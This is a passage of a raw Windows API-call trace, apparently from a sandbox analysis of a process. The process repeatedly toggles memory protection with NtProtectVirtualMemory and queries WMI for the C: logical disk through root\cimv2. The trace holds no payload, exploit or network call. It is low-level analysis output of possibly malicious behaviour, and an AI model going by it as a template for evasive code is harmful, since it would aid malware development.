ProcessHandle=0xffffffff, BaseAddress=0x41e9bc*=0x76e412c4, NumberOfBytesToProtect=0x41e9c0, NewAccessProtection=0x20, OldAccessProtection=0x41e9f4 | out: BaseAddress=0x41e9bc*=0x76e41000, NumberOfBytesToProtect=0x41e9c0, OldAccessProtection=0x41e9f4*=0x4) returned 0x0 [0101.933] GetCurrentProcess () returned 0xffffffff [0101.933] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e9bc*=0x76e412cc, NumberOfBytesToProtect=0x41e9c0, NewAccessProtection=0x4, OldAccessProtection=0x41e9f4 | out: BaseAddress=0x41e9bc*=0x76e41000, NumberOfBytesToProtect=0x41e9c0, OldAccessProtection=0x41e9f4*=0x20) returned 0x0 [0101.934] GetCurrentProcess () returned 0xffffffff [0101.934] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e9bc*=0x76e412cc, NumberOfBytesToProtect=0x41e9c0, NewAccessProtection=0x20, OldAccessProtection=0x41e9f4 | out: BaseAddress=0x41e9bc*=0x76e41000, NumberOfBytesToProtect=0x41e9c0, OldAccessProtection=0x41e9f4*=0x4) returned 0x0 [0101.934] GetCurrentProcess () returned 0xffffffff [0101.934] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e9bc*=0x76e41300, NumberOfBytesToProtect=0x41e9c0, NewAccessProtection=0x4, OldAccessProtection=0x41e9f4 | out: BaseAddress=0x41e9bc*=0x76e41000, NumberOfBytesToProtect=0x41e9c0, OldAccessProtection=0x41e9f4*=0x20) returned 0x0 [0101.934] GetCurrentProcess () returned 0xffffffff [0101.934] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e9bc*=0x76e41300, NumberOfBytesToProtect=0x41e9c0, NewAccessProtection=0x20, OldAccessProtection=0x41e9f4 | out: BaseAddress=0x41e9bc*=0x76e41000, NumberOfBytesToProtect=0x41e9c0, OldAccessProtection=0x41e9f4*=0x4) returned 0x0 [0101.935] GetCurrentProcess () returned 0xffffffff [0101.935] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e9bc*=0x76e41308, NumberOfBytesToProtect=0x41e9c0, NewAccessProtection=0x4, OldAccessProtection=0x41e9f4 | out: BaseAddress=0x41e9bc*=0x76e41000, NumberOfBytesToProtect=0x41e9c0, OldAccessProtection=0x41e9f4*=0x20) returned 0x0 [0101.935] GetCurrentProcess () returned 0xffffffff [0101.935] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e9bc*=0x76e41308, NumberOfBytesToProtect=0x41e9c0, NewAccessProtection=0x20, OldAccessProtection=0x41e9f4 | out: BaseAddress=0x41e9bc*=0x76e41000, NumberOfBytesToProtect=0x41e9c0, OldAccessProtection=0x41e9f4*=0x4) returned 0x0 [0101.935] GetCurrentProcess () returned 0xffffffff [0101.935] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e9bc*=0x76e4132c, NumberOfBytesToProtect=0x41e9c0, NewAccessProtection=0x4, OldAccessProtection=0x41e9f4 | out: BaseAddress=0x41e9bc*=0x76e41000, NumberOfBytesToProtect=0x41e9c0, OldAccessProtection=0x41e9f4*=0x20) returned 0x0 [0101.936] GetCurrentProcess () returned 0xffffffff [0101.936] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e9bc*=0x76e4132c, NumberOfBytesToProtect=0x41e9c0, NewAccessProtection=0x20, OldAccessProtection=0x41e9f4 | out: BaseAddress=0x41e9bc*=0x76e41000, NumberOfBytesToProtect=0x41e9c0, OldAccessProtection=0x41e9f4*=0x4) returned 0x0 [0101.936] GetCurrentProcess () returned 0xffffffff [0101.936] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e9bc*=0x76e41390, NumberOfBytesToProtect=0x41e9c0, NewAccessProtection=0x4, OldAccessProtection=0x41e9f4 | out: BaseAddress=0x41e9bc*=0x76e41000, NumberOfBytesToProtect=0x41e9c0, OldAccessProtection=0x41e9f4*=0x20) returned 0x0 [0101.937] GetCurrentProcess () returned 0xffffffff [0101.937] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e9bc*=0x76e41390, NumberOfBytesToProtect=0x41e9c0, NewAccessProtection=0x20, OldAccessProtection=0x41e9f4 | out: BaseAddress=0x41e9bc*=0x76e41000, NumberOfBytesToProtect=0x41e9c0, OldAccessProtection=0x41e9f4*=0x4) returned 0x0 [0101.937] GetProcAddress (hModule=0x76e40000, lpProcName=0x2) returned 0x76e44642 [0101.938] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6720820, puCount=0x41eb9c | out: puCount=0x41eb9c*=0x0) returned 0x0 [0101.938] WbemDefPath:IWbemPath:GetText (in: This=0x6720820, lFlags=2, puBuffLength=0x41eb98*=0x0, pszText=0x0 | out: puBuffLength=0x41eb98*=0x20, pszText=0x0) returned 0x0 [0101.939] GetProcAddress (hModule=0x76e40000, lpProcName=0x6) returned 0x76e43e59 [0101.939] WbemDefPath:IWbemPath:GetText (in: This=0x6720820, lFlags=2, puBuffLength=0x41eb98*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x41eb98*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0101.939] WbemDefPath:IWbemPath:GetInfo (in: This=0x6720820, uRequestedInfo=0x0, puResponse=0x41eba4 | out: puResponse=0x41eba4*=0xc19) returned 0x0 [0101.939] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6720820, puCount=0x41eb9c | out: puCount=0x41eb9c*=0x0) returned 0x0 [0101.939] WbemDefPath:IWbemPath:GetInfo (in: This=0x6720820, uRequestedInfo=0x0, puResponse=0x41eba4 | out: puResponse=0x41eba4*=0xc19) returned 0x0 [0101.939] WbemDefPath:IWbemPath:GetInfo (in: This=0x6720820, uRequestedInfo=0x0, puResponse=0x41eba4 | out: puResponse=0x41eba4*=0xc19) returned 0x0 [0101.940] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6720820, puCount=0x41eb1c | out: puCount=0x41eb1c*=0x0) returned 0x0 [0101.942] CoGetObjectContext (in: riid=0x346e308*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x41e3d0 | out: ppv=0x41e3d0*=0x72015c) returned 0x0 [0101.942] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x41e3c8 | out: pAptType=0x41e3c8*=1) returned 0x0 [0101.942] IUnknown:QueryInterface (in: This=0x72015c, riid=0x346e2f0*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x41e3cc | out: ppvObject=0x41e3cc*=0x0) returned 0x80004002 [0101.943] IUnknown:Release (This=0x72015c) returned 0x0 [0101.943] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x41dd38 | out: ppv=0x41dd38*=0x6720900) returned 0x0 [0101.944] WbemDefPath:IUnknown:QueryInterface (in: This=0x6720900, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x41df50 | out: ppvObject=0x41df50*=0x0) returned 0x80004002 [0101.944] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6720900, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41df64 | out: ppvObject=0x41df64*=0x67209c0) returned 0x0 [0101.944] WbemDefPath:IUnknown:Release (This=0x6720900) returned 0x0 [0101.944] WbemDefPath:IUnknown:QueryInterface (in: This=0x67209c0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41db84 | out: ppvObject=0x41db84*=0x67209c0) returned 0x0 [0101.944] WbemDefPath:IUnknown:QueryInterface (in: This=0x67209c0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x41db40 | out: ppvObject=0x41db40*=0x0) returned 0x80004002 [0101.944] WbemDefPath:IUnknown:AddRef (This=0x67209c0) returned 0x3 [0101.944] WbemDefPath:IUnknown:QueryInterface (in: This=0x67209c0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x41d49c | out: ppvObject=0x41d49c*=0x0) returned 0x80004002 [0101.944] WbemDefPath:IUnknown:QueryInterface (in: This=0x67209c0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x41d44c | out: ppvObject=0x41d44c*=0x0) returned 0x80004002 [0101.944] WbemDefPath:IUnknown:QueryInterface (in: This=0x67209c0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41d458 | out: ppvObject=0x41d458*=0x765038) returned 0x0 [0101.944] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x765038, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x41d460 | out: pCid=0x41d460*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0101.944] WbemDefPath:IUnknown:Release (This=0x765038) returned 0x3 [0101.944] CoGetContextToken (in: pToken=0x41d4b8 | out: pToken=0x41d4b8) returned 0x0 [0101.944] CoGetContextToken (in: pToken=0x41d8c0 | out: pToken=0x41d8c0) returned 0x0 [0101.944] WbemDefPath:IUnknown:QueryInterface (in: This=0x67209c0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41d950 | out: ppvObject=0x41d950*=0x0) returned 0x80004002 [0101.944] WbemDefPath:IUnknown:Release (This=0x67209c0) returned 0x2 [0101.944] WbemDefPath:IUnknown:Release (This=0x67209c0) returned 0x1 [0101.944] CoGetContextToken (in: pToken=0x41e248 | out: pToken=0x41e248) returned 0x0 [0101.944] CoGetContextToken (in: pToken=0x41e1a8 | out: pToken=0x41e1a8) returned 0x0 [0101.944] WbemDefPath:IUnknown:QueryInterface (in: This=0x67209c0, riid=0x41e278*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x41e274 | out: ppvObject=0x41e274*=0x67209c0) returned 0x0 [0101.945] WbemDefPath:IUnknown:AddRef (This=0x67209c0) returned 0x3 [0101.945] WbemDefPath:IUnknown:Release (This=0x67209c0) returned 0x2 [0101.945] WbemDefPath:IWbemPath:SetText (This=0x67209c0, uMode=0x4, pszPath="//./root/cimv2") returned 0x0 [0101.945] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67209c0, puCount=0x41eb08 | out: puCount=0x41eb08*=0x2) returned 0x0 [0101.945] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x41eb04*=0x0, pszText=0x0 | out: puBuffLength=0x41eb04*=0xf, pszText=0x0) returned 0x0 [0101.945] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x41eb04*=0xf, pszText="00000000000000" | out: puBuffLength=0x41eb04*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0101.945] CoGetObjectContext (in: riid=0x346e308*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x41eab8 | out: ppv=0x41eab8*=0x72015c) returned 0x0 [0101.945] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x41eab0 | out: pAptType=0x41eab0*=1) returned 0x0 [0101.945] IUnknown:QueryInterface (in: This=0x72015c, riid=0x346e2f0*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x41eab4 | out: ppvObject=0x41eab4*=0x0) returned 0x80004002 [0101.945] IUnknown:Release (This=0x72015c) returned 0x0 [0101.946] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x41e420 | out: ppv=0x41e420*=0x6720910) returned 0x0 [0101.946] WbemDefPath:IUnknown:QueryInterface (in: This=0x6720910, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x41e638 | out: ppvObject=0x41e638*=0x0) returned 0x80004002 [0101.946] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6720910, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e64c | out: ppvObject=0x41e64c*=0x6720ba0) returned 0x0 [0101.946] WbemDefPath:IUnknown:Release (This=0x6720910) returned 0x0 [0101.946] WbemDefPath:IUnknown:QueryInterface (in: This=0x6720ba0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e26c | out: ppvObject=0x41e26c*=0x6720ba0) returned 0x0 [0101.946] WbemDefPath:IUnknown:QueryInterface (in: This=0x6720ba0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x41e228 | out: ppvObject=0x41e228*=0x0) returned 0x80004002 [0101.946] WbemDefPath:IUnknown:AddRef (This=0x6720ba0) returned 0x3 [0101.946] WbemDefPath:IUnknown:QueryInterface (in: This=0x6720ba0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x41db84 | out: ppvObject=0x41db84*=0x0) returned 0x80004002 [0101.946] WbemDefPath:IUnknown:QueryInterface (in: This=0x6720ba0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x41db34 | out: ppvObject=0x41db34*=0x0) returned 0x80004002 [0101.946] WbemDefPath:IUnknown:QueryInterface (in: This=0x6720ba0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41db40 | out: ppvObject=0x41db40*=0x765068) returned 0x0 [0101.946] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x765068, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x41db48 | out: pCid=0x41db48*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0101.947] WbemDefPath:IUnknown:Release (This=0x765068) returned 0x3 [0101.947] CoGetContextToken (in: pToken=0x41dba0 | out: pToken=0x41dba0) returned 0x0 [0101.947] CoGetContextToken (in: pToken=0x41dfa8 | out: pToken=0x41dfa8) returned 0x0 [0101.947] WbemDefPath:IUnknown:QueryInterface (in: This=0x6720ba0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e038 | out: ppvObject=0x41e038*=0x0) returned 0x80004002 [0101.947] WbemDefPath:IUnknown:Release (This=0x6720ba0) returned 0x2 [0101.947] WbemDefPath:IUnknown:Release (This=0x6720ba0) returned 0x1 [0101.947] CoGetContextToken (in: pToken=0x41e930 | out: pToken=0x41e930) returned 0x0 [0101.947] CoGetContextToken (in: pToken=0x41e890 | out: pToken=0x41e890) returned 0x0 [0101.947] WbemDefPath:IUnknown:QueryInterface (in: This=0x6720ba0, riid=0x41e960*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x41e95c | out: ppvObject=0x41e95c*=0x6720ba0) returned 0x0 [0101.947] WbemDefPath:IUnknown:AddRef (This=0x6720ba0) returned 0x3 [0101.947] WbemDefPath:IUnknown:Release (This=0x6720ba0) returned 0x2 [0101.947] WbemDefPath:IWbemPath:SetText (This=0x6720ba0, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0101.947] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6720ba0, puCount=0x41eae0 | out: puCount=0x41eae0*=0x2) returned 0x0 [0101.947] WbemDefPath:IWbemPath:GetText (in: This=0x6720ba0, lFlags=4, puBuffLength=0x41eadc*=0x0, pszText=0x0 | out: puBuffLength=0x41eadc*=0xf, pszText=0x0) returned 0x0 [0101.947] WbemDefPath:IWbemPath:GetText (in: This=0x6720ba0, lFlags=4, puBuffLength=0x41eadc*=0xf, pszText="00000000000000" | out: puBuffLength=0x41eadc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0101.947] CoGetObjectContext (in: riid=0x346e308*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x41eae0 | out: ppv=0x41eae0*=0x72015c) returned 0x0 [0101.948] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x41ead8 | out: pAptType=0x41ead8*=1) returned 0x0 [0101.948] IUnknown:QueryInterface (in: This=0x72015c, riid=0x346e2f0*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x41eadc | out: ppvObject=0x41eadc*=0x0) returned 0x80004002 [0101.948] IUnknown:Release (This=0x72015c) returned 0x0 [0101.948] IIDFromString (in: lpsz="{4590F811-1D3A-11D0-891F-00AA004B2E24}", lpiid=0x41e9ec | out: lpiid=0x41e9ec) returned 0x0 [0101.948] CoGetClassObject (in: rclsid=0x7588d4*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x41e700 | out: ppv=0x41e700*=0x6720a80) returned 0x0 [0101.949] GetCurrentThreadId () returned 0xba4 [0101.950] ResetEvent (hEvent=0xb8) returned 1 [0101.950] GetCurrentThreadId () returned 0xba4 [0101.950] GetCurrentThreadId () returned 0xba4 [0101.950] GetCurrentThreadId () returned 0xba4 [0101.950] GetCurrentThreadId () returned 0xba4 [0101.950] ResetEvent (hEvent=0xb8) returned 1 [0101.950] GetCurrentThreadId () returned 0xba4 [0101.950] GetCurrentThreadId () returned 0xba4 [0101.950] SetEvent (hEvent=0xbc) returned 1 [0101.950] SetEvent (hEvent=0xb8) returned 1 [0101.950] CloseHandle (hObject=0x42c) returned 1 [0102.171] WbemLocator:IUnknown:QueryInterface (in: This=0x6720a80, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x41e918 | out: ppvObject=0x41e918*=0x0) returned 0x80004002 [0102.171] WbemLocator:IClassFactory:CreateInstance (in: This=0x6720a80, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e92c | out: ppvObject=0x41e92c*=0x6720d60) returned 0x0 [0102.171] WbemLocator:IUnknown:Release (This=0x6720a80) returned 0x0 [0102.171] WbemLocator:IUnknown:QueryInterface (in: This=0x6720d60, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e54c | out: ppvObject=0x41e54c*=0x6720d60) returned 0x0 [0102.171] WbemLocator:IUnknown:QueryInterface (in: This=0x6720d60, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x41e508 | out: ppvObject=0x41e508*=0x0) returned 0x80004002 [0102.171] WbemLocator:IUnknown:AddRef (This=0x6720d60) returned 0x3 [0102.171] WbemLocator:IUnknown:QueryInterface (in: This=0x6720d60, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x41de64 | out: ppvObject=0x41de64*=0x0) returned 0x80004002 [0102.171] WbemLocator:IUnknown:QueryInterface (in: This=0x6720d60, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x41de14 | out: ppvObject=0x41de14*=0x0) returned 0x80004002 [0102.171] WbemLocator:IUnknown:QueryInterface (in: This=0x6720d60, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41de20 | out: ppvObject=0x41de20*=0x0) returned 0x80004002 [0102.171] CoGetContextToken (in: pToken=0x41de80 | out: pToken=0x41de80) returned 0x0 [0102.172] GetProcAddress (hModule=0x76620000, lpProcName="CoGetObjectContext") returned 0x7666632b [0102.172] CoGetObjectContext (in: riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x765cbc | out: ppv=0x765cbc*=0x720150) returned 0x0 [0102.172] CoGetContextToken (in: pToken=0x41e288 | out: pToken=0x41e288) returned 0x0 [0102.172] WbemLocator:IUnknown:QueryInterface (in: This=0x6720d60, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e318 | out: ppvObject=0x41e318*=0x0) returned 0x80004002 [0102.172] WbemLocator:IUnknown:Release (This=0x6720d60) returned 0x2 [0102.172] WbemLocator:IUnknown:Release (This=0x6720d60) returned 0x1 [0102.173] CoGetContextToken (in: pToken=0x41e8f8 | out: pToken=0x41e8f8) returned 0x0 [0102.173] CoGetContextToken (in: pToken=0x41e858 | out: pToken=0x41e858) returned 0x0 [0102.173] WbemLocator:IUnknown:QueryInterface (in: This=0x6720d60, riid=0x41e928*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x41e924 | out: ppvObject=0x41e924*=0x6720d60) returned 0x0 [0102.173] WbemLocator:IUnknown:AddRef (This=0x6720d60) returned 0x3 [0102.173] WbemLocator:IUnknown:Release (This=0x6720d60) returned 0x2 [0102.174] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6720ba0, puCount=0x41eabc | out: puCount=0x41eabc*=0x2) returned 0x0 [0102.174] WbemDefPath:IWbemPath:GetText (in: This=0x6720ba0, lFlags=8, puBuffLength=0x41eab8*=0x0, pszText=0x0 | out: puBuffLength=0x41eab8*=0xf, pszText=0x0) returned 0x0 [0102.174] WbemDefPath:IWbemPath:GetText (in: This=0x6720ba0, lFlags=8, puBuffLength=0x41eab8*=0xf, pszText="00000000000000" | out: puBuffLength=0x41eab8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0102.174] CoCreateInstance (in: rclsid=0x745f1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x745f12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x41e994 | out: ppv=0x41e994*=0x6720d70) returned 0x0 [0102.175] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6720d70, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x41ea28 | out: ppNamespace=0x41ea28*=0x672d544) returned 0x0 [0102.204] GetCurrentThreadId () returned 0xba4 [0102.204] ResetEvent (hEvent=0xb8) returned 1 [0102.204] GetCurrentThreadId () returned 0xba4 [0102.204] GetCurrentThreadId () returned 0xba4 [0102.204] GetCurrentThreadId () returned 0xba4 [0102.204] GetCurrentThreadId () returned 0xba4 [0102.204] ResetEvent (hEvent=0xb8) returned 1 [0102.204] GetCurrentThreadId () returned 0xba4 [0102.204] GetCurrentThreadId () returned 0xba4 [0102.204] 